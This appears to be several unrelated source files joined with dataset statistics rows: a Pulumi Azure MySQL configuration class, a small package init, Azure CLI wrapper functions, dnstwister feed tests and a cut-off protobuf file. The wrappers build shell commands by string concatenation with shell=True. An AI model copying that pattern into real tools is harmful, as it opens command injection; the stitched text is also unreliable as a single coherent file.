Sets a MySQL Flexible Server Configuration value on a MySQL Flexible Server.
## Disclaimers
> **Note:** Since this resource is provisioned by default, the Azure Provider will not check for the presence of an existing resource prior to attempting to create it.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_flexible_server = azure.mysql.FlexibleServer("exampleFlexibleServer",
resource_group_name=azurerm_resource_group["test"]["name"],
location=azurerm_resource_group["test"]["location"],
administrator_login="adminTerraform",
administrator_password="H@Sh1CoR3!",
sku_name="GP_Standard_D2ds_v4")
example_flexible_server_configuration = azure.mysql.FlexibleServerConfiguration("exampleFlexibleServerConfiguration",
resource_group_name=example_resource_group.name,
server_name=azurerm_mysql_server["example"]["name"],
value="600")
```
## Import
MySQL Flexible Server Configurations can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mysql/flexibleServerConfiguration:FlexibleServerConfiguration interactive_timeout /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforMySQL/flexibleServers/flexibleServer1/configurations/interactive_timeout
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: FlexibleServerConfigurationArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Sets a MySQL Flexible Server Configuration value on a MySQL Flexible Server.
## Disclaimers
> **Note:** Since this resource is provisioned by default, the Azure Provider will not check for the presence of an existing resource prior to attempting to create it.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_flexible_server = azure.mysql.FlexibleServer("exampleFlexibleServer",
resource_group_name=azurerm_resource_group["test"]["name"],
location=azurerm_resource_group["test"]["location"],
administrator_login="adminTerraform",
administrator_password="H@Sh1CoR3!",
sku_name="GP_Standard_D2ds_v4")
example_flexible_server_configuration = azure.mysql.FlexibleServerConfiguration("exampleFlexibleServerConfiguration",
resource_group_name=example_resource_group.name,
server_name=azurerm_mysql_server["example"]["name"],
value="600")
```
## Import
MySQL Flexible Server Configurations can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:mysql/flexibleServerConfiguration:FlexibleServerConfiguration interactive_timeout /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.DBforMySQL/flexibleServers/flexibleServer1/configurations/interactive_timeout
```
:param str resource_name: The name of the resource.
:param FlexibleServerConfigurationArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(FlexibleServerConfigurationArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = FlexibleServerConfigurationArgs.__new__(FlexibleServerConfigurationArgs)
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if server_name is None and not opts.urn:
raise TypeError("Missing required property 'server_name'")
__props__.__dict__["server_name"] = server_name
if value is None and not opts.urn:
raise TypeError("Missing required property 'value'")
__props__.__dict__["value"] = value
super(FlexibleServerConfiguration, __self__).__init__(
'azure:mysql/flexibleServerConfiguration:FlexibleServerConfiguration',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
server_name: Optional[pulumi.Input[str]] = None,
value: Optional[pulumi.Input[str]] = None) -> 'FlexibleServerConfiguration':
"""
Get an existing FlexibleServerConfiguration resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] name: Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
:param pulumi.Input[str] server_name: Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
:param pulumi.Input[str] value: Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _FlexibleServerConfigurationState.__new__(_FlexibleServerConfigurationState)
__props__.__dict__["name"] = name
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["server_name"] = server_name
__props__.__dict__["value"] = value
return FlexibleServerConfiguration(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the MySQL Flexible Server Configuration, which needs [to be a valid MySQL configuration name](https://dev.mysql.com/doc/refman/5.7/en/server-configuration.html). Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the MySQL Flexible Server exists. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="serverName")
def server_name(self) -> pulumi.Output[str]:
"""
Specifies the name of the MySQL Flexible Server. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server_name")
@property
@pulumi.getter
def value(self) -> pulumi.Output[str]:
"""
Specifies the value of the MySQL Flexible Server Configuration. See the MySQL documentation for valid values.
"""
return pulumi.get(self, "value")
| 49.754237
| 284
| 0.68069
| 2,097
| 17,613
| 5.528851
| 0.100143
| 0.053131
| 0.065206
| 0.053131
| 0.827411
| 0.809039
| 0.802657
| 0.774452
| 0.767983
| 0.754614
| 0
| 0.007158
| 0.230625
| 17,613
| 353
| 285
| 49.895184
| 0.848424
| 0.475842
| 0
| 0.602273
| 1
| 0
| 0.104003
| 0.020922
| 0
| 0
| 0
| 0
| 0
| 1
| 0.153409
| false
| 0.005682
| 0.028409
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67a3d4ae1c7b0cfeee8c426acb4eb96c8114ee10
| 157
|
py
|
Python
|
keydecomposer/__init__.py
|
DocSchlock/KeyDecomposer
|
581422e49e5eff2853f4f43b2e2c675cd40da664
|
[
"BSD-3-Clause"
] | null | null | null |
keydecomposer/__init__.py
|
DocSchlock/KeyDecomposer
|
581422e49e5eff2853f4f43b2e2c675cd40da664
|
[
"BSD-3-Clause"
] | null | null | null |
keydecomposer/__init__.py
|
DocSchlock/KeyDecomposer
|
581422e49e5eff2853f4f43b2e2c675cd40da664
|
[
"BSD-3-Clause"
] | null | null | null |
from .keydecompose import decompose_frame, recur_weights, generate_weighted_series
__all__ = ['decompose_frame','recur_weights','generate_weighted_series']
| 39.25
| 82
| 0.847134
| 18
| 157
| 6.722222
| 0.611111
| 0.231405
| 0.31405
| 0.429752
| 0.793388
| 0.793388
| 0.793388
| 0
| 0
| 0
| 0
| 0
| 0.063694
| 157
| 3
| 83
| 52.333333
| 0.823129
| 0
| 0
| 0
| 1
| 0
| 0.33121
| 0.152866
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
67a549aceb79ea0d1f5543bae9d7505cb1a9f411
| 2,908
|
py
|
Python
|
test/pyaz/ams/account_filter/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
test/pyaz/ams/account_filter/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | 9
|
2021-09-24T16:37:24.000Z
|
2021-12-24T00:39:19.000Z
|
test/pyaz/ams/account_filter/__init__.py
|
bigdatamoore/py-az-cli
|
54383a4ee7cc77556f6183e74e992eec95b28e01
|
[
"MIT"
] | null | null | null |
import json, subprocess
from ... pyaz_utils import get_cli_name, get_params
def create(account_name, resource_group, name, start_timestamp=None, end_timestamp=None, presentation_window_duration=None, live_backoff_duration=None, timescale=None, force_end_timestamp=None, bitrate=None, first_quality=None, tracks=None):
params = get_params(locals())
command = "az ams account-filter create " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def show(resource_group, account_name, name):
params = get_params(locals())
command = "az ams account-filter show " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def list(resource_group, account_name):
params = get_params(locals())
command = "az ams account-filter list " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def delete(resource_group, account_name, name):
params = get_params(locals())
command = "az ams account-filter delete " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
def update(resource_group, account_name, name, start_timestamp=None, end_timestamp=None, presentation_window_duration=None, live_backoff_duration=None, timescale=None, bitrate=None, first_quality=None, tracks=None, force_end_timestamp=None, set=None, add=None, remove=None, force_string=None):
params = get_params(locals())
command = "az ams account-filter update " + params
print(command)
output = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout = output.stdout.decode("utf-8")
stderr = output.stderr.decode("utf-8")
if stdout:
return json.loads(stdout)
print(stdout)
else:
raise Exception(stderr)
print(stderr)
| 39.297297
| 293
| 0.689133
| 364
| 2,908
| 5.401099
| 0.164835
| 0.071211
| 0.050865
| 0.053408
| 0.90234
| 0.870804
| 0.870804
| 0.870804
| 0.833164
| 0.833164
| 0
| 0.004288
| 0.198074
| 2,908
| 73
| 294
| 39.835616
| 0.838765
| 0
| 0
| 0.820896
| 0
| 0
| 0.065681
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.074627
| false
| 0
| 0.029851
| 0
| 0.179104
| 0.223881
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67c1a3dcc8915fc7fd6555a1d5521205b59ea28d
| 16,833
|
py
|
Python
|
tests/test_atom.py
|
jkohrman/dnstwister
|
ff668f139a5d49665fd555340be2b63b6c2a91e7
|
[
"Unlicense"
] | null | null | null |
tests/test_atom.py
|
jkohrman/dnstwister
|
ff668f139a5d49665fd555340be2b63b6c2a91e7
|
[
"Unlicense"
] | null | null | null |
tests/test_atom.py
|
jkohrman/dnstwister
|
ff668f139a5d49665fd555340be2b63b6c2a91e7
|
[
"Unlicense"
] | null | null | null |
"""Tests of the atom behaviour."""
# -*- coding: UTF-8 -*-
import base64
import datetime
import textwrap
import unittest
import pytest
import flask.ext.webtest
import mock
import webtest.app
import dnstwister
from dnstwister import tools
import patches
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_unicode_atom(webapp):
"""Unicode should just work too, this is just a sanity check."""
unicode_domain = 'xn--plnt-1na.com'.decode('idna') # 'plànt.com'
get_path = tools.encode_domain(unicode_domain)
with pytest.raises(webtest.app.AppError) as err:
webapp.get('/atom/{}'.format(get_path))
assert '404 NOT FOUND' in err.value.message
assert 'New RSS feed generation currently disabled.' in err.value.message
def test_atom_feeds_validate_domain(webapp):
"""Test that the validation checks for valid domains before creating
feeds.
"""
with pytest.raises(webtest.app.AppError) as err:
webapp.get('/atom/324u82938798swefsdf')
assert '400 BAD REQUEST' in err.value.message
# TODO: Update to pytest-style.
class TestAtom(unittest.TestCase):
"""Tests of the atom feed behaviour."""
def setUp(self):
"""Set up the app for testing."""
# Create a webtest Test App for use
self.app = flask.ext.webtest.TestApp(dnstwister.app)
# Clear the webapp cache
dnstwister.cache.clear()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_new_feed(self):
"""Tests the registration of a new feed - currently disabled."""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = 'www.example.com'
# A feed is registered by trying to load it (and it not already being
# registered).
with pytest.raises(webtest.app.AppError) as err:
res = self.app.get('/atom/{}'.format(base64.b64encode(domain))).follow()
assert '404 NOT FOUND' in err.value.message
assert 'New RSS feed generation currently disabled.' in err.value.message
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_deleted_items_appear_in_rss(self):
"""Tests that deleted items in delta reports appear in the RSS.
"""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = 'www.example.com'
repository.register_domain(domain)
# We can calculate a delta though.
update_date = datetime.datetime(2016, 2, 28, 11, 10, 34)
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [('wwwexa.mple.com', '127.0.0.1', '127.0.0.2')],
'deleted': ['www.eeexample.com', 'www2.example.com.au'],
},
update_date
)
# Clear the webapp cache
dnstwister.cache.clear()
res = self.app.get('/atom/{}'.format(base64.b64encode(domain))).follow()
assert str(res) == textwrap.dedent("""
Response: 200 OK
Content-Type: application/atom+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="text">dnstwister report for www.example.com</title>
<id>http://localhost:80/atom/7777772e6578616d706c652e636f6d</id>
<updated>2016-02-28T11:10:34Z</updated>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<link href="http://localhost:80/atom/7777772e6578616d706c652e636f6d" rel="self" />
<generator>Werkzeug</generator>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">NEW: www.examp1e.com</title>
<id>new:www.examp1e.com:127.0.0.1:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1</h1>
<a href="https://dnstwister.report/analyse/7777772e6578616d7031652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">UPDATED: wwwexa.mple.com</title>
<id>updated:wwwexa.mple.com:127.0.0.1:127.0.0.2:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1 &gt; 127.0.0.2</h1>
<a href="https://dnstwister.report/analyse/7777776578612e6d706c652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">DELETED: www.eeexample.com</title>
<id>deleted:www.eeexample.com:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e6578616d706c652e636f6d">
<title type="text">DELETED: www2.example.com.au</title>
<id>deleted:www2.example.com.au:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e6578616d706c652e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
</feed>
""").strip()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_feed_reading_is_tracked(self):
"""Tests that reading a feed is logged."""
repository = dnstwister.repository
domain = 'www.example.com'
b64domain = base64.b64encode(domain)
# Read dates are None by default
read_date = repository.delta_report_last_read(domain)
assert read_date is None
# Registering a feed will update the read date
repository.register_domain(domain)
self.app.get('/atom/{}'.format(b64domain)).follow()
read_date = repository.delta_report_last_read(domain)
assert type(read_date) is datetime.datetime
# Manually set the date to an older date so we don't have to 'sleep'
# in the test.
repository.mark_delta_report_as_read(
domain, datetime.datetime(2000, 1, 1, 0, 0, 0)
)
# Clear the webapp cache
dnstwister.cache.clear()
# Reading a feed will update the read date
read_date = repository.delta_report_last_read(domain)
self.app.get('/atom/{}'.format(b64domain)).follow()
read_date2 = repository.delta_report_last_read(domain)
assert read_date2 > read_date
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_unregister_tidies_database(self):
"""Tests that you can unregister domains."""
repository = dnstwister.repository
domain = 'www.example.com'
b64domain = base64.b64encode(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
repository.register_domain(domain)
self.app.get('/atom/{}'.format(b64domain)).follow()
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [],
'deleted': [],
},
)
assert repository.is_domain_registered(domain)
assert repository.db.data != {}
repository.unregister_domain(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
# TODO: Update to pytest-style.
class TestAtomUnicode(unittest.TestCase):
"""Tests of the atom feed behaviour, with a Unicode domain."""
def setUp(self):
"""Set up the app for testing."""
# Create a webtest Test App for use
self.app = flask.ext.webtest.TestApp(dnstwister.app)
# Clear the webapp cache
dnstwister.cache.clear()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_new_feed(self):
"""Tests the registration of a new feed - currently disabled."""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = u'www.\u0454xample.com'
# A feed is registered by trying to load it (and it not already being
# registered).
with pytest.raises(webtest.app.AppError) as err:
res = self.app.get('/atom/{}'.format(tools.encode_domain(domain)))
assert '404 NOT FOUND' in err.value.message
assert 'New RSS feed generation currently disabled.' in err.value.message
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_updated_and_deleted_items_appear_in_rss(self):
"""Tests that updated and deleted items in delta reports appear in the
RSS.
"""
repository = dnstwister.repository
# We need a domain to get the feed for.
domain = u'www.\u0454xample.com'
# We can calculate a delta though.
update_date = datetime.datetime(2016, 2, 28, 11, 10, 34)
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [(u'www\u0454xa.mple.com', '127.0.0.1', '127.0.0.2')],
'deleted': [u'www.\u0454xampl\u0454.com', 'www2.example.com.au'],
},
update_date
)
# Clear the webapp cache
dnstwister.cache.clear()
repository.register_domain(domain)
res = self.app.get('/atom/{}'.format(tools.encode_domain(domain)))
assert str(res) == textwrap.dedent("""
Response: 200 OK
Content-Type: application/atom+xml; charset=utf-8
<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title type="text">dnstwister report for www.\xd1\x94xample.com (www.xn--xample-9uf.com)</title>
<id>http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d</id>
<updated>2016-02-28T11:10:34Z</updated>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<link href="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d" rel="self" />
<generator>Werkzeug</generator>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">NEW: www.examp1e.com</title>
<id>new:www.examp1e.com:127.0.0.1:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1</h1>
<a href="https://dnstwister.report/analyse/7777772e6578616d7031652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">UPDATED: www\xd1\x94xa.mple.com (xn--wwwxa-d2e.mple.com)</title>
<id>updated:xn--wwwxa-d2e.mple.com:127.0.0.1:127.0.0.2:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
<content type="html"><h1>IP: 127.0.0.1 &gt; 127.0.0.2</h1>
<a href="https://dnstwister.report/analyse/786e2d2d77777778612d6432652e6d706c652e636f6d">analyse</a></content>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">DELETED: www.\xd1\x94xampl\xd1\x94.com (www.xn--xampl-91ef.com)</title>
<id>deleted:www.xn--xampl-91ef.com:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
<entry xml:base="http://localhost:80/atom/7777772e786e2d2d78616d706c652d3975662e636f6d">
<title type="text">DELETED: www2.example.com.au</title>
<id>deleted:www2.example.com.au:1456657834.0</id>
<updated>2016-02-28T11:10:34Z</updated>
<published>2016-02-28T11:10:34Z</published>
<link href="http://localhost:80/search/7777772e786e2d2d78616d706c652d3975662e636f6d" />
<author>
<name>dnstwister</name>
</author>
</entry>
</feed>
""").strip()
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_feed_reading_is_tracked(self):
"""Tests that reading a feed is logged."""
repository = dnstwister.repository
domain = u'www.\u0454xample.com'
get_param = tools.encode_domain(domain)
# Read dates are None by default
read_date = repository.delta_report_last_read(domain)
assert read_date is None
# Registering a feed will update the read date
repository.register_domain(domain)
self.app.get('/atom/{}'.format(get_param))
read_date = repository.delta_report_last_read(domain)
assert type(read_date) is datetime.datetime
# Manually set the date to an older date so we don't have to 'sleep'
# in the test.
repository.mark_delta_report_as_read(
domain, datetime.datetime(2000, 1, 1, 0, 0, 0)
)
# Clear the webapp cache
dnstwister.cache.clear()
# Reading a feed will update the read date
read_date = repository.delta_report_last_read(domain)
self.app.get('/atom/{}'.format(get_param))
read_date2 = repository.delta_report_last_read(domain)
assert read_date2 > read_date
@mock.patch('dnstwister.repository.db', patches.SimpleKVDatabase())
def test_unregister_tidies_database(self):
"""Tests that you can unregister domains."""
repository = dnstwister.repository
domain = u'www.\u0454xample.com'
get_param = tools.encode_domain(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
repository.register_domain(domain)
repository.update_delta_report(
domain, {
'new': [('www.examp1e.com', '127.0.0.1')],
'updated': [],
'deleted': [],
},
)
assert repository.is_domain_registered(domain)
assert repository.db.data != {}
repository.unregister_domain(domain)
assert not repository.is_domain_registered(domain)
assert repository.db.data == {}
| 43.835938
| 145
| 0.595675
| 1,908
| 16,833
| 5.187631
| 0.126834
| 0.004849
| 0.03334
| 0.023641
| 0.913417
| 0.885734
| 0.874621
| 0.861285
| 0.845322
| 0.836027
| 0
| 0.118809
| 0.277966
| 16,833
| 383
| 146
| 43.950392
| 0.695573
| 0.106636
| 0
| 0.808824
| 0
| 0.058824
| 0.540146
| 0.152045
| 0
| 0
| 0
| 0.005222
| 0.099265
| 1
| 0.044118
| false
| 0
| 0.040441
| 0
| 0.091912
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
67f0b45fe3b23d31d877bb9115bb3fa1da43fa74
| 66,953
|
py
|
Python
|
yandex/cloud/mdb/postgresql/v1/config/host13_pb2.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 36
|
2018-12-23T13:51:50.000Z
|
2022-03-25T07:48:24.000Z
|
yandex/cloud/mdb/postgresql/v1/config/host13_pb2.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 15
|
2019-02-28T04:55:09.000Z
|
2022-03-06T23:17:24.000Z
|
yandex/cloud/mdb/postgresql/v1/config/host13_pb2.py
|
korsar182/python-sdk
|
873bf2a9b136a8f2faae72e86fae1f5b5c3d896a
|
[
"MIT"
] | 18
|
2019-02-23T07:10:57.000Z
|
2022-03-28T14:41:08.000Z
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: yandex/cloud/mdb/postgresql/v1/config/host13.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import wrappers_pb2 as google_dot_protobuf_dot_wrappers__pb2
from yandex.cloud import validation_pb2 as yandex_dot_cloud_dot_validation__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='yandex/cloud/mdb/postgresql/v1/config/host13.proto',
package='yandex.cloud.mdb.postgresql.v1.config',
syntax='proto3',
serialized_options=b'\n)yandex.cloud.api.mdb.postgresql.v1.configZTgithub.com/yandex-cloud/go-genproto/yandex/cloud/mdb/postgresql/v1/config;postgresql',
create_key=_descriptor._internal_create_key,
serialized_pb=b'\n2yandex/cloud/mdb/postgresql/v1/config/host13.proto\x12%yandex.cloud.mdb.postgresql.v1.config\x1a\x1egoogle/protobuf/wrappers.proto\x1a\x1dyandex/cloud/validation.proto\"\xd8.\n\x16PostgresqlHostConfig13\x12=\n\x18recovery_min_apply_delay\x18\x01 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x33\n\x0eshared_buffers\x18\x02 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x31\n\x0ctemp_buffers\x18\x03 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12-\n\x08work_mem\x18\x04 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x34\n\x0ftemp_file_limit\x18\x05 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12\x44\n\x13\x62\x61\x63kend_flush_after\x18\x06 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\n\xfa\xc7\x31\x06\x30-2048\x12I\n\x16old_snapshot_threshold\x18\x07 \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x0c\xfa\xc7\x31\x08-1-86400\x12@\n\x1bmax_standby_streaming_delay\x18\x08 \x01(\x0b\x32\x1b.google.protobuf.Int64Value\x12o\n\x14\x63onstraint_exclusion\x18\t \x01(\x0e\x32Q.yandex.cloud.mdb.postgresql.v1.config.PostgresqlHostConfig13.ConstraintExclusion\x12;\n\x15\x63ursor_tuple_fraction\x18\n \x01(\x0b\x32\x1c.google.protobuf.DoubleValue\x12J\n\x13\x66rom_collapse_limit\x18\x0b \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12J\n\x13join_collapse_limit\x18\x0c \x01(\x0b\x32\x1b.google.protobuf.Int64ValueB\x10\xfa\xc7\x31\x0c\x31-2147483647\x12l\n\x13\x66orce_parallel_mode\x18\r 